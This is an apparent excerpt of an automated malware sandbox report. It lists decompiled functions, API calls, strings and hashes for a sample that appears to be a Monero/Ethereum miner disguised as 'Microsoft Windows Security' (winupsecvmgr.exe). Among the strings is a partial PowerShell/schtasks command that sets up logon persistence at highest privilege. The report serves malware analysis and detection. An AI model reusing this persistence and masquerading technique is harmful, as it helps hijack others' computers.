__crt_waiting_on_module_handle.LIBCMT ref: 009E5027

Part of subcall function 009E78F5: Sleep.KERNEL32(000003E8,00000000,?,009E4F6C,KERNEL32.DLL,?,009E4FB8,?,009E5108,?,?,009E5172,?,009E28C4,?,009E1165), ref: 009E7901
Part of subcall function 009E78F5: GetModuleHandleW.KERNEL32(009E1165,?,009E4F6C,KERNEL32.DLL,?,009E4FB8,?,009E5108,?,?,009E5172,?,009E28C4,?,009E1165,00000000), ref: 009E790A

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 009E5050
GetProcAddress.KERNEL32(?,DecodePointer), ref: 009E5060
__lock.LIBCMT ref: 009E5082
InterlockedIncrement.KERNEL32(52000003), ref: 009E508F
__lock.LIBCMT ref: 009E50A3
___addlocaleref.LIBCMT ref: 009E50C1

Strings

KERNEL32.DLL, xrefs: 009E5016, 009E501B, 009E5026
DecodePointer, xrefs: 009E5058
EncodePointer, xrefs: 009E5044

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 7302300a6e8d9436a55309743446521aaa051bc634678aba6c2cf9872f84c421
Instruction ID: d19951d2cdc473416aab90d32f23559235bf92f315159c0cf46bb9aa25d3b9c4
Opcode Fuzzy Hash: 7302300a6e8d9436a55309743446521aaa051bc634678aba6c2cf9872f84c421
Instruction Fuzzy Hash: 3711D2B1401B81EAD722EF7BC845B5ABBE0AF84718F10442EF49996291CB709E02CF54

Function 009E1000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 009E100E
_memset.LIBCMT ref: 009E101E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 009E1057
Sleep.KERNEL32(000003E8), ref: 009E1067
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 009E1082
Sleep.KERNEL32(000003E8), ref: 009E109C

Strings

D, xrefs: 009E1026
, xrefs: 009E1091
open, xrefs: 009E107B

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: Sleep_memset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 2725567952-2182757814
Opcode ID: 5913c81c0299d511dde629a4228b0d631b72cf81dd44cddefe09fb72cb2638d3
Instruction ID: 14397e7809ebcc82a6a61ffc02425cc42d6348837178c76fb16bc2058638eab8
Opcode Fuzzy Hash: 5913c81c0299d511dde629a4228b0d631b72cf81dd44cddefe09fb72cb2638d3
Instruction Fuzzy Hash: 7F1191B0A84348FBEB21DF90CC47F9E7378AB54B02F100115F6086E2C1D6B15E409755

Function 009E6392 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CreateFrameInfo.LIBCMT ref: 009E63BA

Part of subcall function 009E2F39: __getptd.LIBCMT ref: 009E2F47
Part of subcall function 009E2F39: __getptd.LIBCMT ref: 009E2F55

__getptd.LIBCMT ref: 009E63C4

Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A

__getptd.LIBCMT ref: 009E63D2
__getptd.LIBCMT ref: 009E63E0
__getptd.LIBCMT ref: 009E63EB
_CallCatchBlock2.LIBCMT ref: 009E6411

Part of subcall function 009E2FDE: __CallSettingFrame@12.LIBCMT ref: 009E302A

Part of subcall function 009E64B8: __getptd.LIBCMT ref: 009E64C7
Part of subcall function 009E64B8: __getptd.LIBCMT ref: 009E64D5

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 3ef9f4e3736ae9b85b702889c11eabdb075bb0ca9e82017c6cdd19eba45f9bc1
Instruction ID: b4080414e46629530ce5f862e371e6e16f3223936d8cb5fec7f03b0e9ce82a42
Opcode Fuzzy Hash: 3ef9f4e3736ae9b85b702889c11eabdb075bb0ca9e82017c6cdd19eba45f9bc1
Instruction Fuzzy Hash: 4C11C3B1C04249DFDB01EFA5C846BAE7BB0FF48314F158469F814A7291EB789A119F50

Function 009E60E1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 009E60FB

Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A

__getptd.LIBCMT ref: 009E610C
__getptd.LIBCMT ref: 009E611A

Strings

MOC, xrefs: 009E60ED
csm, xrefs: 009E60F4

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 22d66bda3bd0e28a62dd5cc331779b80c5982ea97763823264e9b4db7458a40c
Instruction ID: 05af6e82ba2071838f66ff9f0852242e07ae0abe5385e8745e48ce221cc87ac5
Opcode Fuzzy Hash: 22d66bda3bd0e28a62dd5cc331779b80c5982ea97763823264e9b4db7458a40c
Instruction Fuzzy Hash: AAE08631508284CFC712AB66C146B2937A8FB99358F1A05B1E54CC7263C774DC409582

Function 009E5666 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 009E5672

Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A

__amsg_exit.LIBCMT ref: 009E5692
__lock.LIBCMT ref: 009E56A2
InterlockedDecrement.KERNEL32(?), ref: 009E56BF
InterlockedIncrement.KERNEL32(02A42C68), ref: 009E56EA

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: c245676106b07ba5f835cfbac949db44776c67abb2b41345062639f3736bedb8
Instruction ID: 3bf26efdb61c3e1cde8e25e9ebd7e90a7b1878a67466a34045c4829212124184
Opcode Fuzzy Hash: c245676106b07ba5f835cfbac949db44776c67abb2b41345062639f3736bedb8
Instruction Fuzzy Hash: F301C031905BD1EBCB23BF66984975E73A4BF80F29F960016F8046B291CB349D42DBD5

Function 009E6DCC Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 009E6DEA

Part of subcall function 009E8AC4: __mtinitlocknum.LIBCMT ref: 009E8ADA
Part of subcall function 009E8AC4: __amsg_exit.LIBCMT ref: 009E8AE6
Part of subcall function 009E8AC4: EnterCriticalSection.KERNEL32(?,?,?,009EAD6A,00000004,009EE780,0000000C,009E8B52,009E1165,?,00000000,00000000,00000000,?,009E511C,00000001), ref: 009E8AEE

___sbh_find_block.LIBCMT ref: 009E6DF5
___sbh_free_block.LIBCMT ref: 009E6E04
HeapFree.KERNEL32(00000000,009E1165,009EE620,0000000C,009E8AA5,00000000,009EE6E0,0000000C,009E8ADF,009E1165,?,?,009EAD6A,00000004,009EE780,0000000C), ref: 009E6E34
GetLastError.KERNEL32(?,009EAD6A,00000004,009EE780,0000000C,009E8B52,009E1165,?,00000000,00000000,00000000,?,009E511C,00000001,00000214), ref: 009E6E45

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: efe7fa22943a91908b69504fd367f4d86d8484df618c3ba23477a29f9bdea0be
Instruction ID: 021937d0e146b34cfb928e701a00069e4be7fffb4e245a9334ae8c9efb2ecc95
Opcode Fuzzy Hash: efe7fa22943a91908b69504fd367f4d86d8484df618c3ba23477a29f9bdea0be
Instruction Fuzzy Hash: 4A01A235805381EADF32BBB3DC0A75E3BA89F54BA5F10041DF104AA0D2DF348D50DA54

Function 009E673F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___BuildCatchObject.LIBCMT ref: 009E6752

Part of subcall function 009E66AD: ___BuildCatchObjectHelper.LIBCMT ref: 009E66E3

_UnwindNestedFrames.LIBCMT ref: 009E6769
___FrameUnwindToState.LIBCMT ref: 009E6777

Strings

csm, xrefs: 009E674E, 009E6763, 009E6776, 009E6794, 009E67A4

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 649a1ff7459718f2e3d3456518d9a5961d8fbacca156a18fad0351ff192bb4c7
Instruction ID: e68a946262662cfa73c1ad8e3481da3c81b6e024a9b20983c8b948496352f0f0
Opcode Fuzzy Hash: 649a1ff7459718f2e3d3456518d9a5961d8fbacca156a18fad0351ff192bb4c7
Instruction Fuzzy Hash: 3E012431000289BBDF136F52CD85EAE3F6AEF68398F108010BD4814121D736DDA1EBA1

Function 009E2789 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009E2790
std::bad_exception::bad_exception.LIBCMT ref: 009E27AD

Part of subcall function 009E2702: std::runtime_error::runtime_error.LIBCPMT ref: 009E270D

__CxxThrowException@8.LIBCMT ref: 009E27BB

Part of subcall function 009E47A8: RaiseException.KERNEL32(?,?,009E4873,009E24A3,?,?,?,?,009E4873,009E24A3,009EE264,009EFDA0,009E24A3,00000000,00000000), ref: 009E47EA

Strings

invalid string position, xrefs: 009E2795

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 3299838469-1799206989
Opcode ID: 39873f8ba373e324eba8d13957e1c7c3e445b313a652ce80c035a2fe767cf4e5
Instruction ID: ae0201709b557185bb465b7fa8d4070c368cded7ae9f092f37f87379d3c513a3
Opcode Fuzzy Hash: 39873f8ba373e324eba8d13957e1c7c3e445b313a652ce80c035a2fe767cf4e5
Instruction Fuzzy Hash: 5DD01773940288EACB02E7D2C882FDD737CAB94715F440024F240A6082DBB1AE08CA60

Function 009E480F Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 009E4829

Part of subcall function 009E6FEA: __FF_MSGBANNER.LIBCMT ref: 009E700D
Part of subcall function 009E6FEA: __NMSG_WRITE.LIBCMT ref: 009E7014
Part of subcall function 009E6FEA: HeapAlloc.KERNEL32(00000000,009E1156,00000001,00000000,00000000,?,009E8B08,009E1165,00000001,009E1165,?,009E8A4E,00000018,009EE6E0,0000000C,009E8ADF), ref: 009E7061

std::bad_alloc::bad_alloc.LIBCMT ref: 009E484C

Part of subcall function 009E47F4: std::exception::exception.LIBCMT ref: 009E4800

std::bad_exception::bad_exception.LIBCMTD ref: 009E4860
__CxxThrowException@8.LIBCMT ref: 009E486E

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: AllocException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 3622535130-0
Opcode ID: daa13e7ba89055bf31c8a877ccd7c897b31ee0ae4aecb89041f24e71ec640735
Instruction ID: 8431def547b095fd9d42c787c49011ad18d584d88207a1a17b98978772f8c5f9
Opcode Fuzzy Hash: daa13e7ba89055bf31c8a877ccd7c897b31ee0ae4aecb89041f24e71ec640735
Instruction Fuzzy Hash: 49F027308042CA66CB17B763EC1AB4D3B6C9FD0368F104036F810950D2DF71DE448A81

Function 009E5DD2 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 009E5DDE

Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A

__getptd.LIBCMT ref: 009E5DF5
__amsg_exit.LIBCMT ref: 009E5E03
__lock.LIBCMT ref: 009E5E13

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 999b04260c6e5ab60d65d031adad5788b850a78da6228ed352e7e8f71517702a
Instruction ID: 721cada425014a7243b08b823f2ccf5cf634b60e1d20d6ae49467e7d787f365a
Opcode Fuzzy Hash: 999b04260c6e5ab60d65d031adad5788b850a78da6228ed352e7e8f71517702a
Instruction Fuzzy Hash: 2EF09032914FC4EBD723FBA6880674E73A0AF80B18F06456DF4049B2D2DF749E41DA51

Function 009E64B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009E2F8C: __getptd.LIBCMT ref: 009E2F92
Part of subcall function 009E2F8C: __getptd.LIBCMT ref: 009E2FA2

__getptd.LIBCMT ref: 009E64C7

Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A

__getptd.LIBCMT ref: 009E64D5

Strings

csm, xrefs: 009E64E3

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 8a8dffcca61443c03a43e0e0d372c62ca4caf34c30849b0ec3943ea4bff257a1
Instruction ID: 34976df995b3d1632f93a7ec3b167b7f35fe9f2ed21531db437cc9c9de09fc2a
Opcode Fuzzy Hash: 8a8dffcca61443c03a43e0e0d372c62ca4caf34c30849b0ec3943ea4bff257a1
Instruction Fuzzy Hash: D50128B4900285CBCF3A9F22C440AADBBF9AF69351F985A2DF04196655CF30CD81CB41

Analysis Process: winupsecvmgr.exePID: 2960, Parent PID: 1060COMMON

Executed Functions

Function 00007FF731CD14B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2779020398.00007FF731CD1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FF731CD0000, based on PE: true

Associated: 0000001D.00000002.2778986197.00007FF731CD0000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000001D.00000002.2779486245.00007FF732259000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000001D.00000002.2779517074.00007FF732262000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000001D.00000002.2779546227.00007FF732265000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000001D.00000002.2779578329.00007FF732266000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff731cd0000_winupsecvmgr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction ID: 42a59a8470c3b10966810a70a6416ba47150a56f769512a3ea23ddecf3e617f0
Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction Fuzzy Hash: 0EB0926190820AB4E3003BA19841298A2206B14740FA18020C40C02362DAAC50409720

Analysis Process: conhost.exePID: 4828, Parent PID: 2592COMMON

Executed Functions

Function 00007FF6CE2085C0 Relevance: 55.0, APIs: 15, Strings: 21, Instructions: 1045
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6CE20871A
memset.MSVCRT ref: 00007FF6CE2088B2
memset.MSVCRT ref: 00007FF6CE208A35
memset.MSVCRT ref: 00007FF6CE208AFE
memset.MSVCRT ref: 00007FF6CE208C9D
memset.MSVCRT ref: 00007FF6CE208F0E
memset.MSVCRT ref: 00007FF6CE2090B7
memset.MSVCRT ref: 00007FF6CE209187
_wcsicmp.MSVCRT ref: 00007FF6CE209515
memcpy.MSVCRT ref: 00007FF6CE20956C
memcpy.MSVCRT ref: 00007FF6CE209590
memcpy.MSVCRT ref: 00007FF6CE209835
memcpy.MSVCRT ref: 00007FF6CE20985F
memcpy.MSVCRT ref: 00007FF6CE209A38
memcpy.MSVCRT ref: 00007FF6CE209A60

Strings

5RK\E, xrefs: 00007FF6CE208F13
\cmd.exe, xrefs: 00007FF6CE208A5B, 00007FF6CE208AD2
xmr, xrefs: 00007FF6CE209438
\System32, xrefs: 00007FF6CE2088DD, 00007FF6CE208A13
\schtasks.exe, xrefs: 00007FF6CE2091C1, 00007FF6CE209263
\reg.exe, xrefs: 00007FF6CE2090E4, 00007FF6CE20915B
\BaseNamedObjects\dzemvzqxamm, xrefs: 00007FF6CE208631
\Microsoft Windows Security\winupsecvmgr.exe, xrefs: 00007FF6CE208D19, 00007FF6CE208EEC
%S /run /tn "Microsoft Windows Security", xrefs: 00007FF6CE20945F
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00007FF6CE208B70, 00007FF6CE208C74
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security, xrefs: 00007FF6CE20984B, 00007FF6CE209884, 00007FF6CE209A08
\BaseNamedObjects\dzemvzqxamm, xrefs: 00007FF6CE208726
\BaseNamedObjects\vljmdnomkxppwbqz, xrefs: 00007FF6CE2092FB
0, xrefs: 00007FF6CE20884A
APPDATA=, xrefs: 00007FF6CE209007
USERPROFILE=, xrefs: 00007FF6CE208E32
\Google\Libs\, xrefs: 00007FF6CE208F48, 00007FF6CE20908A
SYSTEMROOT=, xrefs: 00007FF6CE208965
%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest , xrefs: 00007FF6CE209A49, 00007FF6CE209A81, 00007FF6CE209AEC
eth, xrefs: 00007FF6CE209427
e; }, xrefs: 00007FF6CE209A94

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: memset$memcpy$_wcsicmpwcslen
String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$SYSTEMROOT=$USERPROFILE=$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\vljmdnomkxppwbqz$\Google\Libs\$\Microsoft Windows Security\winupsecvmgr.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
API String ID: 1321921031-4262344814
Opcode ID: 2e1c1d34a24cbe38c32c3fc8598f4389799938dfa055740cadfb5a8dc442976e
Instruction ID: cf335967ee80ef1a8f13045edfc4946259aa7968a4db02ebaa8ff373daa3d80f
Opcode Fuzzy Hash: 2e1c1d34a24cbe38c32c3fc8598f4389799938dfa055740cadfb5a8dc442976e
Instruction Fuzzy Hash: 82D29A61C1C6C295F7229F69A6123F573B1BFB1782F055231F9CCA26A2DF2EE6458304

Function 00007FF6CE1F1180 Relevance: 12.2, APIs: 8, Instructions: 195
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF6CE1F11E1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CE1F1253
malloc.MSVCRT ref: 00007FF6CE1F1307
strlen.MSVCRT ref: 00007FF6CE1F1329
malloc.MSVCRT ref: 00007FF6CE1F1335
memcpy.MSVCRT ref: 00007FF6CE1F1349
GetStartupInfoA.KERNEL32 ref: 00007FF6CE1F1453

Memory Dump Source

Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true

Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
Instruction ID: 90ae7881be4808f7f9db57fd34f0fd9fd0f81c96b34e7cbaef9f4ba75aa65e7e
Opcode Fuzzy Hash: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
Instruction Fuzzy Hash: 28817E32F0868685FB209F95E65177933B1BF64BA6F444035EE8DE3B92DE6DE8108340

Function 00007FF6CE1F1720 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF6CE1F191D
memset.MSVCRT ref: 00007FF6CE1F19F0

Strings

`, xrefs: 00007FF6CE1F1C77
xmr, xrefs: 00007FF6CE1F1722
X, xrefs: 00007FF6CE1F1CB1
explorer.exe, xrefs: 00007FF6CE1F1916
